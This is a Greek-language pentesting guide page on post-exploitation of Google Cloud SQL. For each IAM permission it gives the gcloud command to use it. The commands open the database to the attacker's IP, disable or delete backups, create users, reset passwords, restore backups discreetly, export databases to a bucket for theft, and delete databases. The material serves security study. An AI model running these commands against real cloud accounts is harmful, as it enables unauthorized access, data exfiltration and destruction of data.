GCP - Cloud SQL Post Exploitation

Cloud SQL

Για περισσότερες πληροφορίες σχετικά με το Cloud SQL, ελέγξτε:

cloudsql.instances.update, ( cloudsql.instances.get)

Για να συνδεθείτε στις βάσεις δεδομένων, χρειάζεστε μόνο πρόσβαση στην πόρτα της βάσης δεδομένων και να γνωρίζετε το όνομα χρήστη και τον κωδικό πρόσβασης, δεν υπάρχουν απαιτήσεις IAM. Ένας εύκολος τρόπος για να αποκτήσετε πρόσβαση, υποθέτοντας ότι η βάση δεδομένων έχει δημόσια διεύθυνση IP, είναι να ενημερώσετε τα επιτρεπόμενα δίκτυα και να επιτρέψετε τη δική σας διεύθυνση IP να έχει πρόσβαση σε αυτήν.

# Use --assign-ip to make the database get a public IPv4
gcloud sql instances patch $INSTANCE_NAME \
--authorized-networks "$(curl ifconfig.me)" \
--assign-ip \
--quiet

mysql -h <ip_db> # If mysql

# With cloudsql.instances.get you can use gcloud directly
gcloud sql connect mysql --user=root --quiet

Είναι επίσης δυνατό να χρησιμοποιήσετε --no-backup για να διαταράξετε τα αντίγραφα ασφαλείας της βάσης δεδομένων.

Δεδομένου ότι αυτές είναι οι απαιτήσεις, δεν είμαι εντελώς σίγουρος ποια είναι τα δικαιώματα cloudsql.instances.connect και cloudsql.instances.login. Αν το ξέρετε, στείλτε μια PR!

cloudsql.users.list

Λάβετε μια λίστα με όλους τους χρήστες της βάσης δεδομένων:

gcloud sql users list --instance <intance-name>

cloudsql.users.create

Αυτή η άδεια επιτρέπει να δημιουργηθεί ένας νέος χρήστης μέσα στη βάση δεδομένων:

gcloud sql users create <username> --instance <instance-name> --password <password>

cloudsql.users.update

Αυτή η άδεια επιτρέπει να ενημερώσετε τον χρήστη μέσα στη βάση δεδομένων. Για παράδειγμα, μπορείτε να αλλάξετε τον κωδικό πρόσβασής του:

gcloud sql users set-password <username> --instance <instance-name> --password <password>

cloudsql.instances.restoreBackup, cloudsql.backupRuns.get

Τα αντίγραφα ασφαλείας μπορεί να περιέχουν παλιές ευαίσθητες πληροφορίες, οπότε είναι ενδιαφέρον να τα ελέγξετε. Επαναφέρετε ένα αντίγραφο ασφαλείας μέσα σε μια βάση δεδομένων:

gcloud sql backups restore <backup-id> --restore-instance <instance-id>

Για να το κάνετε με πιο διακριτικό τρόπο, συνιστάται να δημιουργήσετε μια νέα SQL instance και να ανακτήσετε τα δεδομένα εκεί αντί για τις τρέχουσες βάσεις δεδομένων.

cloudsql.backupRuns.delete

Αυτή η άδεια επιτρέπει τη διαγραφή αντιγράφων ασφαλείας:

gcloud sql backups delete <backup-id> --instance <instance-id>

cloudsql.instances.export, storage.objects.create

Εξαγωγή μιας βάσης δεδομένων σε ένα Cloud Storage Bucket ώστε να μπορείτε να την αποκτήσετε από εκεί:

# Export sql format, it could also be csv and bak
gcloud sql export sql <instance-id> <gs://bucketName/fileName> --database <db>

cloudsql.instances.import, storage.objects.get

Εισαγωγή μιας βάσης δεδομένων (επικαλύπτει) από ένα Cloud Storage Bucket:

# Import format SQL, you could also import formats bak and csv
gcloud sql import sql <instance-id> <gs://bucketName/fileName>

cloudsql.databases.delete

Διαγράψτε μια βάση δεδομένων από την db instance:

gcloud sql databases delete <db-name> --instance <instance-id>